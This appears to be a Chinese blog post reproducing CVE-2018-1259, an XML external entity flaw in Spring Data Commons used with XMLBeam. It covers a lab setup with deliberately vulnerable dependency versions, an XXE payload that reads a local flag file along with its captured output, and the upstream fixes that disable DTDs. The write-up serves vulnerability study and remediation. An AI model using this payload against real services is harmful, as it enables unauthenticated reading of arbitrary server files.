CVE-2018-1259

漏洞简介

XMLBeans 提供了底层XML数据的对象视图，同时还能访问原始的XML信息集合。Spring Data Commons 1.13至1.13.11以及2.0至2.0.6的版本在与XMLBeam1.4.14或更早的版本进行结合使用时，XMLBeam不会限制XML外部实体应用，导致未经身份验证的远程恶意用户可以针对Spring Data的请求绑定特定的参数，访问系统上的任意文件

环境搭建

获取Spring项目包

1	git clone https://github.com/spring-projects/spring-data-examples.git

IDEA打开项目spring-data-examples/web/projection

修改pom.xml文件（将依赖修改为有漏洞的版本）

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<artifactId>spring-data-web-projection</artifactId>
	<name>Spring Data - JSON and XML projection web example</name>
	<dependencies>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-web</artifactId>
		</dependency>

		<dependency>
			<groupId>org.springframework.data</groupId>
			<artifactId>spring-data-commons</artifactId>
			<version>2.0.5.RELEASE</version>
		</dependency>

		<dependency>
			<groupId>com.jayway.jsonpath</groupId>
			<artifactId>json-path</artifactId>
		</dependency>

		<dependency>
			<groupId>org.xmlbeam</groupId>
			<artifactId>xmlprojector</artifactId>
			<version>1.4.14</version>
		</dependency>
	</dependencies>
	
	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
			</plugin>
		</plugins>
	</build>
</project>

这里选择 spring-data-commons采用2.0.5版本， XMLBeam采用1.4.14版本

修改后 右键->Maven->reload project 如果不行试试 File -> Invalidate Caches -> Invaliidate and restart

然后右键运行默认执行在8080端口

漏洞复现

首先构造正常的XML

1 2	<?xml version="1.0" encoding="UTF-8"?> <user><firstname>aaaa</firstname><lastname>bbbb</lastname></user>

POST方法请求体放入xml 注意Content-Type: application/XML

可以看到对应回显

然后增加DTD读取任意文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
<!ELEMENT foo ANY >
<!ENTITY aaaa SYSTEM "file:///E:/path/to/flag.txt" >
]>
<user><firstname>&aaaa;</firstname><lastname>bbbb</lastname></user>

回显：

1	Received firstname: FLAG{!!!!!!!!!!!!!!HERE I AM!!!!!!!!!!!!!!}, lastname: bbbb

漏洞修复

# xmlbeam
https://github.com/SvenEwald/xmlbeam/commit/f8e943f44961c14cf1316deb56280f7878702ee1

# spring-data-commons
https://github.com/spring-projects/spring-data-commons/commit/b8974a292ab463a304eda987632be4d9c145f5f8

不允许XML包含外部实体，禁用DTD

factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);


private static final String[] FEATURE_DEFAULTS = new String[] { "http://apache.org/xml/features/disallow-doctype-decl#true", //
            "http://xml.org/sax/features/external-general-entities#false", //
            "http://xml.org/sax/features/external-parameter-entities#false", //
            "http://apache.org/xml/features/nonvalidating/load-external-dtd#false" };

本博客采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.

Prev Home Next

CVE-2018-1259复现

CVE-2018-1259

漏洞简介

环境搭建

漏洞复现

漏洞修复